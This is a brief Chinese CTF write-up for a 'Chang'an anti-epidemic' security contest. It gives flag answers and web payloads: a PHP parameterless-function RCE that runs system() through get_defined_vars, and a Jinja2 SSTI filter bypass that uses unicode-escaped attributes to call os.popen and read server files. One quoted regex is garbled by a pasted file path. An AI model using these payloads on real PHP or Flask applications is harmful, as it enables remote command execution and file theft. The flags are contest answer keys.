长安“战疫”网络安全卫士守护赛writeup
misc
八卦迷宫
得到flag
cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}
西安加油
tcp流里面找到base64编码
在线转为zip解压
拼图得到flag
cazy{make_XiAN_great_Again}
web
RCE_No_Para
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
if(!preg_match('![img](file:///C:\Users\M1keal\AppData\Roaming\Tencent\QQTempSys\V7(XMWRN]{G8~CI}BCCR3QC.gif)ssion|end|next|header|dir/i',$_GET['code'])){
eval($_GET['code']);
}else{
die("Hacker!");
}
}else{
show_source(__FILE__);
}
?>
参考链接
PHP Parametric Function RCE · sky’s blog (skysec.top)
所以paylaod:
?m1kael=system(“cat%20/var/www/html/flag.php”);&code=eval(current(current(get_defined_vars())));
Flask
根据提示
admin?name=payload?1.js?
然后过滤了[]和_
参考链接
以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区 (aliyun.com)
所以payload:
{
%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22))|attr(%22\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f%22)(%22os%22)|attr(%22popen%22)(%22ls /%22)|attr(%22read%22)()%}
然后
{
%print(lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"))|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("os")|attr("popen")("cat%20/f*")|attr("read")()%}%20.js?
Flag配送中心
CVE-2016-5385
vulhub漏洞复现 · Ywc’s blog (yinwc.github.io)
文章评论